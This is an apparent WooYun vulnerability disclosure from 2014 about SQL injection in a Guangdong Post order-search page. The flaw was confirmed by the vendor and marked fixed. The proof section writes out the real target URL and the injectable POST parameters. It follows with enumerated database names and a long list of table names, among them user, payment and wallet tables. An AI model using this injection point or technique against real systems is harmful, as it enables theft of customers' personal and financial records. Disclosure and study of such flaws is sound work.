
Vulnerability summary

Defect ID: wooyun-2014-077630

Title: Guangdong Post SQL injection exposing a very large number of databases

Affected vendor: China Post Group Corporation, Information Technology Bureau

Author: 紫霞仙子

Submitted: 2014-09-28 15:32

Fixed: 2014-11-12 15:34

Published: 2014-11-12 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-09-28: Details sent to the vendor; awaiting vendor action
2014-09-28: Vendor confirmed; details disclosed to the vendor only
2014-10-08: Details disclosed to core white hats and domain experts
2014-10-18: Details disclosed to regular white hats
2014-10-28: Details disclosed to intern white hats
2014-11-12: Details disclosed to the public

Brief description:

The postal service!!

Detailed description:

The amount of data is enormous; the very first database has over four hundred tables. Terrifying.

Proof of vulnerability:

http://www.183.gd.cn/Order/SearchOrder.aspx
post data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDw3NzM1ODYxMTt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjtpPDEyPjtpPDEzPjtpPDI3Pjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8Mj47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47Pj47dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47Oz47dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47Oz47dDxAMDw7Ozs7Ozs7Ozs7Pjs7Pjs%2BPjs%2BPjtsPFJhZGlvQnV0dG9uMTtSYWRpb0J1dHRvbjE7UmFkaW9CdXR0b24yO1JhZGlvQnV0dG9uMjs%2BPru5DFzRafRQmm5yZyyThYEdvRQq&g1=RadioButton1&txtuserpsw=88952634&txtID=88952634&DeliverEmsNo=88952634&txtName=88952634&btnFind=Button&txtusername=88952634"
available databases [10]:
[*] 183dbnew
[*] GDYXDB
[*] LabourUnion
[*] master
[*] model
[*] msdb
[*] phone_fee
[*] tempdb
[*] test
[*] xcxt
Only part of the table listing is posted here.
| Opr_Group |
| OrderBase |
| OrderBase1 |
| OrderBase20100520 |
| OrderBase20100819 |
| OrderBaseStatusChange |
| OrderBase_bak |
| OrderCreditInfo |
| OrderInterfaceLog |
| OrderInvoice |
| OrderItem |
| OrderItem1 |
| OrderLog |
| OrderManageConditionDetail |
| OrderManageRule |
| OrderManager |
| OrderModifyTime |
| OrderMsg |
| OrderStatus20100520 |
| OrderStatusbak |
| OrderbaseEmsNo |
| OrganBaseInfo |
| OrganExtraInfo |
| OrganPayMethod |
| OrganTemplet |
| OrganType |
| Organ_Page |
| Organ_T_AIRLINE_BOOK |
| Organ_Type |
| Package_ShipFee |
| PageCode |
| PageCode100601 |
| PageCode100803 |
| PageCode20100520 |
| PageCode20110106 |
| PageCodebak |
| PageModel |
| Page_Func |
| Paper |
| PayMode |
| PayMode20100819 |
| PayMode20100909 |
| PayResult |
| Pay_Order |
| Paymode_SaleRule |
| Plane |
| PointSetting |
| PostCode |
| PreBook |
| Present |
| PresentPoint |
| Probability |
| ProductCriticism |
| ProductStage |
| Provider |
| PrtMsg |
| Publish |
| RPT_BusinessDaily |
| RPT_ShowTicketInfo |
| RecommendInfo |
| RecommendMatter |
| RemitMoney |
| RetTicketLog |
| RetTicketRecord |
| ReturnGoodsRuleInfo |
| ReturnMatterLog |
| RoadSiteCity |
| RoadSiteCitybak |
| Rpt_InsurBillDetail |
| SMSetting |
| STK |
| STK_Log |
| SaleChannel |
| SaleRuleInfo |
| SelfMail |
| Series |
| Service |
| SetOrderTime |
| ShipMode |
| ShipRuleBase |
| ShipRuleInfo |
| ShortMessage |
| ShowInfo |
| ShowLocation |
| ShowMessage |
| ShowTicketInfo |
| ShowTicketInfobak |
| ShowTicketRptInfoDate |
| ShowZhuHaiHangZhang |
| Stamp |
| StampType |
| StockMessage |
| SystemMatterCode |
| SystemMatterType |
| T_AIRLINE_BOOK |
| T_AIRLINE_CODE |
| T_CITY_CODE |
| T_INTERCITY |
| TbCustPayMode |
| TbPayCust |
| TbPayOrderInfo |
| Tb_Public_City |
| TempEMSNo |
| TempOrder |
| TempOrderlog |
| TempOrderlogbak |
| TempletType |
| TotalOrder |
| TrainOrderItem |
| TrainTicketOrder |
| TrainTicketOrderItem |
| TraveClass |
| TraveProduct |
| TraveTicket |
| TravelGroup |
| TravelGroupAttendInfo |
| TravelGroup_TravelSite |
| TravelLine |
| TravelPauseDate |
| TravelSite |
| TravelType |
| UserAddress |
| UserBaseInfo |
| UserExtraInfo |
| UserFavour |
| V_GetDate |
| V_VoucherMessage |
| View_183AndXhDzTicket |
| View_183SaleData |
| View_BulletinSearch |
| View_CartShowTicket |
| View_ChuPiaoSearch |
| View_ClassSort |
| View_CountChuPiao |
| View_CountTicketPay |
| View_CountTraveTicket |
| View_DiaoBoLiShi |
| View_EVoucherPayOrderReport |
| View_EditMemberLog |
| View_GetUploadMoonCakeOrders |
| View_GetUploadMoonCakeOrders20100909 |
| View_JiaoYiMingXiLog |
| View_Matter |
| View_MatterDept |
| View_MemberExchangePoint |
| View_MemberOrder |
| View_MemberOrderBase |
| View_MemberOrderGetPoint |
| View_MemberSecondOrderSearch |
| View_MemeberOrderSearch |
| View_NAFamilyReport |
| View_NotInMemOrderBase |
| View_NotInMemOrderItem |
| View_OrderBaseOver |
| View_OrderBasePayed |
| View_OrderCommCount |
| View_OrderCount |
| View_OrderCount20110106 |
| View_OrderCountReport |
| View_OrderCreditInfo |
| View_OrderInvoice |
| View_OrderItemOver |
| View_OrderReportAddEVoucher |
| View_OrganBaseInfo |
| View_PayCust |
| View_PayOrderInfo |
| View_PayOrderReport |
| View_ProviderSearchTicket |
| View_RealShowInfo |
| View_Search183Order |
| View_SearchBusinessPayMode |
| View_SearchComplain |
| View_SearchMatterBase |
| View_SearchMatterBase20110106 |
| View_SearchMemberCashTicket |
| View_SearchMemberEVoucher |
| View_SearchOrderInfo |
| View_SearchOrderInfo20110427 |
| View_SearchOrganTemplet |
| View_SearchPresent |
| View_SearchPresentPoint |
| View_SearchProductStage |
| View_SearchTraveProduct |
| View_SearchTraveTicket |
| View_SearchUndoOrderInfo |
| View_ShowInfo |
| View_ShowTicketInfo |
| View_TBPayOrderInfoAndOut |
| View_TicketBalanceReport |
| View_TicketPay |
| View_TrainTicketPayResult |
| View_UserSearch |
| View_VirtualCardItemDetailSystemNo |
| View_Voucher |
| View_VoucherList |
| View_WuLiaoGuanLi |
| View_WuLiaoMingXi |
| View_XHOrderOpr |
| View_XinYongEDu |
| View_YeWuGuiZheGuanLi |
| VirtualCardBase |
| VirtualCardDept |
| VirtualCardItem |
| VisitMsg |
| VisitRecord |
| VoucherConfig |
| VoucherItem |
| VoucherLog |
| VoucherType |
| VoucherTypeBind |
| WalletInfo |
| WangDianXianE |
| WebMsg |
| WorkBusiness |
| XhOrderOpr |
| XinWen |
| XinYongEDu |
| XinYongEDubak |
| YiDiJieSuan |
| YinHangLiuShui |
| YinHangOrganID |
| YouHuiMingXi |
| 183dbuserxx.D99_CMD |
| 183dbuserxx.D99_REG |
| 183dbuserxx.D99_Tmp |
| 183dbuserxx.JCZ3Tmp |
| 183dbuserxx.MatterBase_XX |
| 183dbuserxx.OrderBase20110427 |
| 183dbuserxx.cmd |
| 183dbuserxx.comd_list |
| 183dbuserxx.jiaozhu |
| 183dbuserxx.kill_kkbak |
| 183dbuserxx.userbaseinfo_bak20110124 |
| 183dbuserxx.userextrainfo_bak20110124 |
| 183dbuserxx.voucherbak |
| account |
| airport_airline_book |
| bbs1 |
| board |
| bookmark |
| bookticket |
| cart |
| cartbak |
| cin*** |
| class |
| config |
| dtproperties |
| eticket_kh_book |
| featureplan |
| featureprice |
| fly_bendi_user |
| flygongsi |
| flyjixing |
| flyshiju |
| hall |
| kehu_info |
| kh_inf |
| kh_trade |
| lykp*** |
| message |
| netportorder |
| notice |
| operaterorder |
| program |
| seat |
| setwayvlue |
| t |
| tbPayAddOnes |
| test |
| texorder |
| ticket |
| user*** |
| vcityorder |
| voucher |
| voucherRefound |
| vwCustRpt |
| vwMemb*** |
| vwOrder |
| zhengce |

Fix recommendation:

If this database were dumped, the impact would be far too great.

Copyright notice: when reposting, please credit the source: 紫霞仙子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-09-28 15:55

Vendor reply:

Thanks!

Latest status:

None yet